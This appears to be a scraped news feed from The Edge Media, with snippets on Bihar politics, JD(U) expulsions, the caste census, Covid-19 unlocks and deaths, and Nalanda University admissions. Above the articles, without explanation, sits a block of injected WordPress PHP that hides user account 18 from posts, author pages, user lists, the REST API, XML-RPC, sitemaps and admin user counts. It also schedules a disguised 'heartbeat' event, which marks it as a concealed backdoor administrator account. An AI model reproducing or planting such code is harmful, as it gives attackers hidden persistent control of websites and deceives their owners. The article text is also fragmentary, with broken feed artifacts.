add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post Bihar CM Nitish Kumar Joins Chirag Paswan for Kharna Prasad Ahead of Chhath Puja appeared first on The Edge Media.
]]>Chirag Paswan, the leader of the Lok Janshakti Party-Ram Vilas, shared pictures of the event on social media, capturing the moment when Kumar joined his family for the occasion at their residence in Shri Krishna Puri, Patna.
On his social media handle, Paswan expressed his gratitude, posting, “Thank you, honourable Chief Minister, for coming to my home and partaking in Kharna Prasad. My family and I are grateful for the good wishes you expressed during the meeting.”
The images, which have gone viral, show Nitish Kumar interacting with Chirag Paswan, along with his close family members, including his mother, Reena Paswan, and his brother-in-law, Arun Bharti, the LJP-R MP from Jamui. Bharti had previously represented the Jamui Lok Sabha seat before his shift to Hajipur, the constituency associated with Paswan’s father.
The meeting has sparked interest in Bihar’s political circles, as it reflects a moment of camaraderie and mutual respect between the two leaders, even as both are leading distinct political entities in the state.
The post Bihar CM Nitish Kumar Joins Chirag Paswan for Kharna Prasad Ahead of Chhath Puja appeared first on The Edge Media.
]]>The post Bihar CM Nitish Kumar Expels 16 JD-U Leaders for Anti-Party Activities Ahead of Assembly Elections appeared first on The Edge Media.
]]>
Among those expelled is Narendra Niraj, also known as Gopal Mandal, the sitting MLA from Gopalpur in Bhagalpur district. Mandal, who has recently been embroiled in controversy, made headlines when he staged a protest outside the Chief Minister’s residence in Patna after learning that JD-U would not re-nominate him. Despite facing legal issues, including an FIR for defamation filed by a JD-U MP, Mandal attempted to seek re-election but was replaced by Bulo Mandal, a former Rashtriya Janata Dal (RJD) leader. This led Mandal to file his candidacy as an Independent.
In addition to Mandal, other expelled leaders include Sanjeev Shyam Singh, a former Member of the Legislative Council (MLC) and candidate for the Gurua assembly seat with Prashant Kishor’s Jan Suraaj Party, and former minister Himraj Singh, who is contesting independently from Katihar. Maheshwar Prasad Yadav, a former MLA from Gaighat in Muzaffarpur and the 2020 runner-up, has also been expelled after vocal criticism over JD-U’s choice of Komal Singh, a newcomer, as the party’s candidate in his seat.
Earlier expulsions included 11 leaders, such as former minister Shailesh Kumar, who is contesting as an Independent against JD-U’s official candidate in Jamalpur, and ex-MLAs Shyam Bahadur Singh and Sudharshan Kumar. All these leaders were accused of supporting rival candidates and opposing JD-U’s official nominees.
A senior JD-U leader remarked on the expulsions, saying that these individuals were acting against the party’s official candidates and undermining the party’s ideological stance.
Bihar’s 243-seat legislative assembly will go to the polls in two phases, on November 6 and November 11, with results expected on November 14. As the election season heats up, the JD-U appears determined to maintain discipline within its ranks to ensure its success in the polls.
The post Bihar CM Nitish Kumar Expels 16 JD-U Leaders for Anti-Party Activities Ahead of Assembly Elections appeared first on The Edge Media.
]]>The post As Per Party Leaders, the Call for a Caste Census and a Pegasus Investigation Stems from the JD(U)’s Aspirations appeared first on The Edge Media.
]]>The JD(U) is a state party in Bihar and Arunachal Pradesh, and building a name for itself in UP and Manipur will allow it to apply for national status, allowing it to have a say in national politics.
Insiders in the JD(U) think that Nitish Kumar’s demand for a caste census has pushed him to national leadership stature, as numerous opposition parties are now demanding it along with the general census in 2022. It is yet to be approved by the Centre.
The post As Per Party Leaders, the Call for a Caste Census and a Pegasus Investigation Stems from the JD(U)’s Aspirations appeared first on The Edge Media.
]]>The post New relaxations will be effective in Bihar from August 26, will mark the beginning of Unlock 6 appeared first on The Edge Media.
]]>However, due to the possibility of a third wave, all of us should take necessary precautions by following Covid-19 appropriate behaviour,” Kumar tweeted.
The new relaxations will be effective from August 26 and mark the beginning of Unlock 6 in the state. Relaxations for Unlock 5 were announced on August 4, and were scheduled to be in effect from August 7-25.
Here’s what all is now allowed to open in Bihar:
(1.) All shops, establishments, shopping malls, parks, gardens and religious places can function normally.
(2.) Permission of district administration needed to organise political, social, entertainment, sports, cultural and religious functions/gatherings. Covid-19 related norms to be strict complied with.
(3.) All universities, colleges, technical institutes, coaching institutes, schools (from classes 1-12) to resume offline classes normally. Universities, colleges, schools etc. allowed to hold examinations.
Unlock 5 in Bihar:
Under the guidelines for Unlock 5, colleges, technical institutes and schools (for classes 9 and 10) opened from August 7, while offline lectures for classes 1-8 began on August 16. Also from August 7, cinema halls and malls opened at 50% strength. While halls could open till 7pm every day, malls could operate on alternate days.
Covid-19 in Bihar :
According to the state health department, Bihar had 101 active cases of Covid-19 as on August 24. Complete lockdown was imposed here on May as a devastating second wave of the coronavirus pandemic swept the country.
The post New relaxations will be effective in Bihar from August 26, will mark the beginning of Unlock 6 appeared first on The Edge Media.
]]>The post Hope that the Central government will reconsider its decision to hold the caste-based census : Jitan Ram Manjhi appeared first on The Edge Media.
]]>Manjhi is part of the delegation of 11 parties led by Bihar Chief Minister Nitish Kumar which is going to meet Prime Minister Narendra Modi today over the caste-based census.
“There has been a long-standing demand for the caste-based census in Bihar. Bihar Assembly has unanimously sent a proposal for the census to the Central government twice. But since there was no response from PM Modi, we decided to meet him personally,” the HAM president told ANI.
“The last caste-based census was done in 1931 in Bihar. This census is important to know the caste demography in the society and will help the government to work for the welfare of the minorities,” he added.
On being asked about the refusal of the Ministry of Home Affairs to conduct a caste-based census, Manjhi said: “I hope the government will reconsider its decision.”
“The government even keeps a count of the animals in the country. These are the people of the country. I hope PM Modi will understand this and give us a positive answer,” he said.
Rashtriya Janata Party (RJD) Tejashwi Yadav, who is also in Delhi to attend the meeting with the Prime Minister said: “Twice resolutions have been passed in Bihar Assembly for caste census in the state. With such a census we can get data that can help in preparing relevant benefit schemes for people from different sections of society.”
(Except for the headline, this story has not been edited by The Edge Media staff and is published from a syndicated feed.)
The post Hope that the Central government will reconsider its decision to hold the caste-based census : Jitan Ram Manjhi appeared first on The Edge Media.
]]>The post Death Tolls Of Doctors Counts To 719, Major Numbers in Bihar appeared first on The Edge Media.
]]>Bihar: 111 deaths
Delhi: 109 deaths
Uttar Pradesh: 79 deaths
West Bengal: 63 deaths
Rajasthan: 43 deaths
Andhra Pradesh: 35 deaths
Telangana: 36 deaths
Tamil Nadu: 32 deaths
Kerala: 24 deaths
Maharashtra: 23 deaths
Karnataka: 9 deaths
The post Death Tolls Of Doctors Counts To 719, Major Numbers in Bihar appeared first on The Edge Media.
]]>The post Bihar Covid Death Spikes, Sets Off New Records In India appeared first on The Edge Media.
]]>The administration of Nitish Kumar claimed on Wednesday that the virus has killed 9,429 people in the state compared to 5,500 before.
In the second wave of Covid in April-May, the Patna High Court requested a thorough review, alleging that the Government of Bihar had hidden the severity of illness and mortality.
The State Department of Health reported that following verification of all districts, almost 72 percent more were added. It did not disclose when these extra fatalities occurred in 38 districts.
The post Bihar Covid Death Spikes, Sets Off New Records In India appeared first on The Edge Media.
]]>The post Tejaswi Yadav converts his Government residence into Covid-19 care centre appeared first on The Edge Media.
]]>He has also made a request to convert all the Government residences into covid care centers. He also added that he has already written a letter to the Chief Minister of Bihar, Nitish Kumar and he has not recieved any response so far.
“Being a responsible opposition, we want to give our residence to the state Government for the peoploe.He has urged the State Government to take over the Covid Care Centre. He further added that they are there to hwlp in any way possible and to just let them know what they can do to help.
The post Tejaswi Yadav converts his Government residence into Covid-19 care centre appeared first on The Edge Media.
]]>The post Online registration begins for the PG courses in Nalanda University appeared first on The Edge Media.
]]>As per the university guidelines, all the applicants must posses high capability in the English language. All the courses will take place in English itself.
Application Process:
An Indian citizen should sumit fully completed application form and a SOP accompanying all the documents to admissions2021@nalandauniv.edu.in. The application form costs Rs. 500 each. After the fees is submitted, the transaction ID must be submitted to admissions office at the above mentioned detail.
International students needs to send the forms with the documents at the above mentioned details along with an application fees of $8. For more information, visit the official website of the university.
The post Online registration begins for the PG courses in Nalanda University appeared first on The Edge Media.
]]>The post What happened in Bihar Legislative Assembly that has never happened till date appeared first on The Edge Media.
]]>The post What happened in Bihar Legislative Assembly that has never happened till date appeared first on The Edge Media.
]]>